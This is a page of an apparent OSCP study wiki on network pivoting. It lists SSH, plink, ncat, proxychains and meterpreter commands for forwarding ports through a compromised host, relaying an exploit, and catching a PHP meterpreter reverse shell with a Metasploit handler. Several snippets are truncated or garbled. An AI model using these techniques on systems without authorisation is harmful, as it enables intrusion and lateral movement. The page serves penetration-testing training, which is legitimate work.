OSCP
  • All About OSCP
  • OSCP- One Page Repository
  • About the Author
  • Basic Linux & Windows Commands
    • Linux Commands
    • Windows
      • cmd
      • Powershell
      • Basics of windows
    • Linux / WindowsMain commands
    • Bash Scripting
  • Recon (Scanning & Enumeration)
    • Active Info Gathering
      • My Network Recon Checklist
      • My Web Recon Checklist
      • Network Enumeration
      • Port Scanning
    • Common Ports and Services
      • Other Services Enumeration
    • DNS Zone Transfer Attack
    • SNMP Enumeration
    • SMB Enumeration
    • Web Application Directory bruteforcing / fingerprinting
    • Port & Services Scanning
  • Web Application
    • My checklist
      • LFI
      • RFI
      • SQLI
    • File Upload bypass
    • Enumeration and Exploitation
    • No-Sql Injection
    • SQL Injection
    • Hidden Files and directories
    • RFI
    • LFI
  • Brute Force
    • Reuse the hash
    • Password Crack
  • Shells
    • Linux Reverse Shell [One liner]
    • Reverse Shell to fully interactive
    • Reverse Shell Cheat Sheet
    • WebShell
  • Transferring files
    • My Checklist
    • Transfer files on linux
  • Priv Escalation
    • Linux Priv Escalation
      • g0tmi1k linux privilege escalation
      • Privilege Escalation - Linux
      • Checklist - Linux Privilege Escalation
    • Windows Priv Escalation
      • Fuzzysecurity window priv escalation
      • Privilege Escalation - Windows
      • Checklist - Local Windows Privilege Escalation
  • Post Exploitation
    • Cover your tracks
    • Persistence
    • Loot Linux
    • Loot Windows
    • Escaping Restricted Shell
    • Meterpreter shell for post-exploitation
    • Spawn Shell
  • Pivoting
    • My Checklist for Pivoting
    • Tunneling and Port Forwarding
    • Pivotind understanding
  • Buffer Overflow
    • Buffer overflow
    • Buffer overflow Step by Step
      • Study about buffer overflow
      • Brainpan
      • VulnServer
      • Minishare
  • Main Tools
  • MISC
    • Exploit Compiling
  • CheatSheet (Short)
  • OSCP/ Vulnhub Practice learning
    • Machines Practice
    • My Practice on HTB Windows boxes
    • My Practice on Vulnhub boxes
    • Over the Wire (Natas)
    • Over The wire (Bandit)
Powered by GitBook
On this page
  • ssh -L 80:ip:80 user@ip - local port forwarding
  • nmap -PN -sT -sV –p 80 localhost
  • nmap -PN -sV –p 80 --script=http-methods localhost
  • nikto -host ip -useproxy http://127.0.0.1:80/
  • ssh -D 127.0.0.1:9150 -f -N user@ip
  • proxychains4 -f ~/pivot.conf ncat -v ip 4444
  • ./exploit.py 127.0.0.1 10000
  • ncat -lv --broker -m2 4444
  • nc -v 127.0.0.1 4444
  • msfcli exploit/multi/handler PAYLOAD=php/meterpreter_reverse_tcp LHOST=ip LPORT=9999 E

Was this helpful?

  1. Pivoting

Pivotind understanding

PreviousTunneling and Port ForwardingNextBuffer Overflow

Last updated 4 years ago

Was this helpful?

ssh -L 9001:yahoo.com:80 home -L ::

ssh -L ::

ssh -R 9001:intra-site.com:80 home (Executed from 'work')

plink.exe -l root -pw mysecretpassword 111.111.111.111 -R 3307:127.0.0.1:3306

Port forward with metasploit We can also forward ports using metasploit. Say that the compromised machine is running services that are only accessible from within the network, from within that machine. To access that port we can do this in meterpreter: portfwd add -l -p -r portfwd add -l 3306 -p 3306 -r 192.168.222

portfwd add -l 3389 -p 3389 -r 192.168.1.222

root@host:~# for i in $(seq 1 254); do (ping -c 1 10.2.2.${i} | grep "bytes from" &); done;

$nc –l –p 80 0backpipe

ssh –L port:destination_host:destination_port username@pivot_host

ssh -L 80:ip:80 user@ip - local port forwarding

nmap -PN -sT -sV –p 80 localhost

nmap -PN -sV –p 80 --script=http-methods localhost

nikto -host ip -useproxy

burp suite: destination host: * proxy host: 127.0.0.1 proxy port: 80 Authenticaton type: none

Dynamic port forwarding

SSH dynamic port forwarding is set up on the attacker’s system by entering:

ssh -D 127.0.0.1:9150 -f -N user@ip

The syntax of the command is ssh –D address:port –f –N username@pivot_host

2.8 Using Ncat for Pivoting

ncat --listen --proxy-type http ip 8080

run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24

use auxiliary/server/socks4a

==================================================================================== ssh portforwarding

ssh -L 127.0.0.1:10000:192.168.63.142:10000 webmaster@ip

ssh -L 127.0.0.1:4444:192.168.63.142:4444 webmaster@ip

====================================================================================

ssh -D 127.0.0.1:8888 webmaster@ip

strict_chain quiet_mode proxy_dns remote_dns_subnet 224 tcp_read_time_out 15000 tcp_connect_time_out 8000 localnet 127.0.0.0/255.0.0.0

[ProxyList] socks4 127.0.0.1 8888

proxychains4 -f ~/pivot.conf /usr/bin/python exploit.py ip 10000

proxychains4 -f ~/pivot.conf ncat -v ip 4444

=======================================================================================

ncat LDFLAGS="-static" ./configure && make ncat_build (build ncat static binary)

ncat -lv --broker -m2 10000 $ ncat -v 192.168.81.125 10000 -c "ncat -v 192.168.63.142 10000"

./exploit.py 127.0.0.1 10000

ncat -lv --broker -m2 4444

$ ncat -v 192.168.81.125 4444 -c "ncat -v 192.168.63.142 4444"

nc -v 127.0.0.1 4444

============================================================================= metasploit

msfcli exploit/multi/handler PAYLOAD=php/meterpreter_reverse_tcp LHOST=ip LPORT=9999 E

msf exploit(handler) > route add ip 255.255.255.0 1

proxychaing portforwarding

https://n0where.net/how-to-ssh-tunnels-and-stuff
http://127.0.0.1:80/
https://github.com/haad/proxychains
https://blog.techorganic.com/2012/10/10/introduction-to-pivoting-part-2-proxychains/